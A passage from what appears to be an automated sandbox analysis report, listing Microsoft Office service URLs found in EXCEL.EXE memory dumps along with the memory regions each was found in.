    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.ai66
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWrite
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comD8
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comI9
    Source: EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comP
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comc
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comc:9
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.coml
    Source: EXCEL.EXE, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmpString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFilea1
    Source: EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://tasks.office.com
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://tasks.office.com.
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://tellmeservice.osi.office.netst
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/t
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: EXCEL.EXE, 00000000.00000002.982062545.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792419093.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656095068.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886851258.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829883976.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.842980218.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728506712.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843787373.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.847529633.0000000012A13000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://webshell.suite.office.com8jK
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
